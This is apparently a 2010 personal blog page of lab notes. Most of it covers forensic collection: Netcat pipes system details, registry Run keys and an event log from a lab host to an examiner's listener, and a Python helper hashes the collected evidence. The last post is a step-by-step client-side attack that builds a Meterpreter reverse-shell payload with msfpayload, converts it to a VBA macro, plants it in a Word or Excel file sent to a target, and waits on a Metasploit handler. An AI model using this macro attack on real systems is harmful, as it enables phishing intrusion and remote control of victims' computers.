Monday, July 26, 2010

My Personal Blog Moved!

Dear All,

As of today, my personal blog has moved to http://flexi-learn.blogspot.com
New posts will be published there as soon as possible.

Thursday, June 24, 2010

Covert Analysis II (Forensics)

On LON-WEB1, open the Event Viewer MMC snap-in, select the System log, then choose Save Log File As and save the log under another name:
Example: C:\Backup\SysEvent-Backup.evt

From LON-WEB1, send the SysEvent-Backup.evt file to the CHFI-XP2 machine:

D:\Forensics\Netcat>nc -v 131.107.1.254 99 < C:\Backup\SysEvent-Backup.evt

From the CHFI-XP2 machine, receive the file (this listener must already be running when the send command above is issued):

C:\Tools\Netcat>nc -v -L -p 99 -w 60 > E:\Evidence\SysEvent-Backup.evt


To analyze:

On CHFI-XP2, open Event Viewer and open the saved log file to view the events.

Overt Analysis (Forensics)

Use mmc on the CHFI-XP2 machine and connect to the evidence machine (LON-WEB1).

Launch the mmc with runas:

C:\>runas /user:LON-WEB1\administrator "mmc"

Once the MMC has launched, connect to the evidence machine.

Link:
Forensics Acquisition Utility (FAU)
http://gmgsystemsinc.com/fau/

Covert Analysis I (Forensics)

On CHFI-XP2, launch Netcat in Listening Mode:

C:\Tools\Netcat>nc -v -L -p 99 >> E:\Evidence\MyEvidence.txt

On LON-WEB1, launch Netcat in Client Mode:

D:\Forensics\Netcat>date /t | nc 131.107.1.254 99 -w10
D:\Forensics\Netcat>time /t | nc 131.107.1.254 99 -w10

D:\Forensics\Netcat>ipconfig /all | nc 131.107.1.254 99 -w10
D:\Forensics\Netcat>netstat -an | nc 131.107.1.254 99 -w10
D:\Forensics\Netcat>nbtstat -n | nc 131.107.1.254 99 -w10
D:\Forensics\Netcat>arp -a | nc 131.107.1.254 99 -w10
D:\Forensics\Netcat>route print | nc 131.107.1.254 99 -w10
D:\Forensics\Netcat>tasklist | nc 131.107.1.254 99 -w10

Display registry values:

D:\Forensics\Netcat>reg query hklm\software\microsoft\windows\currentversion\run | nc 131.107.1.254 99 -w10

If you need to run Netcat from a different directory, call it by its full path:

D:\Forensics>cd Sysinternalssuite

D:\Forensics\Sysinternalssuite>pslist | D:\Forensics\Netcat\nc 131.107.1.254 99 -w10
D:\Forensics\Sysinternalssuite>psloggedon | D:\Forensics\Netcat\nc 131.107.1.254 99 -w10
D:\Forensics\Sysinternalssuite>psloglist | D:\Forensics\Netcat\nc 131.107.1.254 99 -w10
D:\Forensics\Sysinternalssuite>psservice | D:\Forensics\Netcat\nc 131.107.1.254 99 -w10
D:\Forensics\Sysinternalssuite>psfile | D:\Forensics\Netcat\nc 131.107.1.254 99 -w10
D:\Forensics\Sysinternalssuite>pipelist | D:\Forensics\Netcat\nc 131.107.1.254 99 -w10
D:\Forensics\Sysinternalssuite>listdlls | D:\Forensics\Netcat\nc 131.107.1.254 99 -w10
D:\Forensics\Sysinternalssuite>procfeatures | D:\Forensics\Netcat\nc 131.107.1.254 99 -w10

MyEvidence.txt is the file that stores the collected evidence.
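Netcat gives no integrity check on what lands in MyEvidence.txt or SysEvent-Backup.evt, so the examiner side should hash each artifact as soon as the listener closes and keep a custody record to compare against before analysis. The Python helper below is an added example, not part of this post or of Netcat; the log format, the source host name LON-WEB1 and the sample file contents are constructed for the demo.

```python
import hashlib
import json
import tempfile
from datetime import datetime, timezone
from pathlib import Path

def sha256_file(path):
    """Stream the file through SHA-256 so a large .evt dump is not read into memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            digest.update(chunk)
    return digest.hexdigest()

def record_custody(evidence_path, log_path, source_host):
    """Append one JSON-lines record (file, size, hash, UTC time, origin) for an artifact."""
    evidence_path = Path(evidence_path)
    entry = {
        "file": evidence_path.name,
        "size": evidence_path.stat().st_size,
        "sha256": sha256_file(evidence_path),
        "collected_utc": datetime.now(timezone.utc).isoformat(timespec="seconds"),
        "source_host": source_host,
    }
    with open(log_path, "a", encoding="utf-8") as log:
        log.write(json.dumps(entry) + "\n")
    return entry

def verify_custody(evidence_path, log_path):
    """True if the artifact still matches its latest logged hash, False if not, None if never logged."""
    name = Path(evidence_path).name
    logged = None
    with open(log_path, encoding="utf-8") as log:
        for line in log:
            entry = json.loads(line)
            if entry["file"] == name:
                logged = entry["sha256"]  # the most recent record for this file wins
    return None if logged is None else sha256_file(evidence_path) == logged

def demo():
    """Constructed walk-through: log a capture, verify it, then catch a truncated copy."""
    with tempfile.TemporaryDirectory() as tmp:
        evidence, log = Path(tmp) / "MyEvidence.txt", Path(tmp) / "custody.jsonl"
        evidence.write_bytes(b"Thu 06/24/2010\r\n10:15 AM\r\n<ipconfig /all output>\r\n")
        record_custody(evidence, log, source_host="LON-WEB1")
        intact = verify_custody(evidence, log)
        evidence.write_bytes(evidence.read_bytes()[:10])  # simulate a cut-off transfer
        tampered = verify_custody(evidence, log)
        unknown = verify_custody(Path(tmp) / "never-logged.evt", log)
        return intact, tampered, unknown
```

Run record_custody right after the listener exits and verify_custody before opening the file for analysis; a False result means the artifact changed or the transfer was cut short.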

Forensics Useful Links

http://www.foundstone.com/us/resources-free-tools.asp
http://www.nu2.nu/pebuilder/
http://portableapps.com/
http://www.e-fense.com/products.php
http://forensic.seccure.net/
http://gmgsystemsinc.com/fau/

Tuesday, May 18, 2010

Client-side Attack by Using Evil MS-Office Apps (Excel or Word)

Step 1: Create your own payload

cd /pentest/exploits/framework3

./msfpayload windows/meterpreter/reverse_tcp LHOST=131.107.1.252 LPORT=443 X > /tmp/payload.exe

Step 2: Convert your newly created payload to a VBA (Visual Basic for Applications) script

cd /pentest/exploits/framework3/tools

./exe2vba.rb /tmp/payload.exe /tmp/payload.vba

Step 3: Copy and Paste the contents of the payload to your evil file

Open your evil file (Excel or Word), select Tools > Macro > Visual Basic Editor, paste the contents of payload.vba, then save the file.

Step 4: Send the evil file to your client

Step 5: Wait for the reverse connection from the client

msf > use exploit/multi/handler
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > set LHOST 131.107.1.252
msf > set LPORT 443
msf > exploit